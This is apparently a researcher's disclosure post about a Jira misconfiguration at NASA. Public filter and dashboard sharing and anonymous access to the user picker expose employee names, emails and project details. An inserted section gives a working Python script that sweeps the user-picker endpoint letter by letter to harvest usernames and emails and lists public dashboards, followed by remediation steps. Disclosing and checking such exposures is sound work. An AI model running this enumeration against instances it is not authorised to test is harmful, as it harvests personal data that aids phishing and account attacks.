Hi All,

Here, I’ll be talking about an interesting vulnerability that I found in NASA’s Jira (Atlassian’s issue-tracking and project-management software), or more specifically a misconfiguration issue that caused the leakage of NASA’s internal sensitive information, including internal user details, project details, employee names and employee email addresses. Let’s see what the exact issue was.

One of the biggest concerns of any company is ensuring that internal information is kept confidential and made available only to specific, authorised individuals inside and outside the organisation. In other words, by maintaining the confidentiality, integrity and availability of their data (among other aspects), companies can sustain a competitive advantage regarding their development plans, findings, hiring and so on.

There are a couple of settings in Jira that, when not configured properly, disclose information about the application and its users and give any user on the internet unauthorised access to some of the company’s internal data. Such information may also aid an attacker in gaining further access to the application, for example by supplying a complete list of valid usernames to target.

When creating filters or dashboards in Jira, you choose who they are shared with. The issue was the permission these sharing options actually grant: when a filter is shared with “All users” or a dashboard with “Everyone”, it is not shared only within the organisation, as people commonly assume, but made public, i.e. readable by anonymous users over the internet. Jira also has a user picker (the autocomplete behind user fields) which, when anonymous access to it is allowed, returns a complete list of every user’s username and email address. That disclosure is the result of an authorisation misconfiguration in Jira’s Global Permissions settings, where the “Browse Users” global permission has been granted to a group that includes anonymous users. Because of this permission scheme, the following internal information was exposed:

all of the organisation’s employees’ names and email addresses,

employees’ roles, through Jira groups,

current projects and upcoming milestones, through Jira dashboards and filters.
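The following script is an added example written for this page, not code from the original post or from Atlassian. It checks the two anonymous exposure paths described above: the user picker REST endpoint (/rest/api/2/user/picker), which returns usernames and email addresses when the Browse Users global permission reaches anonymous users, and the dashboard listing (/rest/api/2/dashboard), which returns dashboards shared with “Everyone” to an unauthenticated caller. Both endpoint paths are Jira’s documented REST API; the JSON responses embedded in the script are constructed sample data for offline use, and the assumption that the email may appear either as an emailAddress field or inside the picker’s html snippet is noted in the code.

```python
import json
import re
import string
import urllib.request
from typing import Callable, Dict, List

# A fetcher takes a URL and returns the response body, raising on HTTP errors.
# Injecting it lets the checks run offline against constructed sample responses.
Fetcher = Callable[[str], str]

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def anonymous_get(url: str) -> str:
    """Plain unauthenticated GET: exactly what an anonymous web user sees."""
    req = urllib.request.Request(url, headers={"Accept": "application/json"})
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode("utf-8")


def parse_user_picker(body: str) -> Dict[str, str]:
    """Map username -> email (or '') from a /rest/api/2/user/picker response.

    Jira Server answers {"users": [{"name": ..., "displayName": ..., "html": ...}], ...}.
    Assumption for this example: the address is carried either in an explicit
    "emailAddress" field or inside the "html" snippet the picker renders, so both
    are checked.
    """
    users: Dict[str, str] = {}
    for u in json.loads(body).get("users", []):
        name = u.get("name") or u.get("key") or u.get("displayName")
        if not name:
            continue
        email = u.get("emailAddress", "")
        if not email:
            m = EMAIL_RE.search(u.get("html", ""))
            email = m.group(0) if m else ""
        users[name] = email
    return users


def enumerate_users(base_url: str, fetch: Fetcher = anonymous_get,
                    queries: str = string.ascii_lowercase,
                    max_results: int = 1000) -> Dict[str, str]:
    """Query the picker once per single-letter prefix and merge the results.

    The picker only returns users matching the query, so sweeping a-z covers most
    of a directory; a 401/403/404 on a query means nothing is exposed for it.
    """
    found: Dict[str, str] = {}
    for q in queries:
        url = f"{base_url.rstrip('/')}/rest/api/2/user/picker?query={q}&maxResults={max_results}"
        try:
            found.update(parse_user_picker(fetch(url)))
        except Exception:
            continue
    return found


def anonymous_dashboards(base_url: str, fetch: Fetcher = anonymous_get) -> List[str]:
    """Names of dashboards visible without logging in (/rest/api/2/dashboard).

    Jira ships 'System Dashboard' as public by default; anything else listed here
    is a dashboard someone shared with 'Everyone'.
    """
    url = f"{base_url.rstrip('/')}/rest/api/2/dashboard?maxResults=100"
    body = json.loads(fetch(url))
    return [d.get("name", "") for d in body.get("dashboards", [])]


def assess(base_url: str, fetch: Fetcher = anonymous_get) -> Dict[str, object]:
    """Summarise both misconfigurations for one instance."""
    users = enumerate_users(base_url, fetch)
    dashboards = anonymous_dashboards(base_url, fetch)
    return {
        "user_picker_exposed": bool(users),
        "users": users,
        "public_dashboards": [d for d in dashboards if d != "System Dashboard"],
    }


# Constructed sample responses (not from any real instance) so the checks can be
# exercised offline; a real run uses anonymous_get against the target instead.
SAMPLE_RESPONSES = {
    "/rest/api/2/user/picker": json.dumps({
        "users": [
            {"name": "jdoe", "key": "jdoe", "displayName": "Jane Doe",
             "html": "<strong>Jane Doe</strong> - jdoe@example.org (jdoe)"},
            {"name": "bsmith", "key": "bsmith", "displayName": "Bob Smith",
             "emailAddress": "bsmith@example.org"},
        ],
        "total": 2, "header": "Showing 2 of 2 matching users",
    }),
    "/rest/api/2/dashboard": json.dumps({
        "startAt": 0, "maxResults": 100, "total": 2,
        "dashboards": [
            {"id": "10000", "name": "System Dashboard"},
            {"id": "10100", "name": "Q3 Release Tracking"},
        ],
    }),
}


def sample_fetch(url: str) -> str:
    """Offline stand-in for anonymous_get, keyed on the endpoint path."""
    for path, body in SAMPLE_RESPONSES.items():
        if path in url:
            return body
    raise RuntimeError("HTTP 404")  # mimic an endpoint that is not exposed


if __name__ == "__main__":
    print(json.dumps(assess("https://jira.example.org", sample_fetch), indent=2))
```

Run it with `assess("https://jira.example.org")` (the default fetcher) against an instance you are authorised to test; any users returned or any dashboard beyond the default System Dashboard confirms the exposure. The remediation is an administrative one: remove every group that includes anonymous users from the Browse Users global permission, and review filters and dashboards whose sharing is set to “All users” or “Everyone”.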

NASA User Details Exposed

I found that the Jira instance used by NASA had a misconfigured setting where any anonymous user could access the user picker functionality (described above) and pull out the complete list of every NASA user’s username and email address.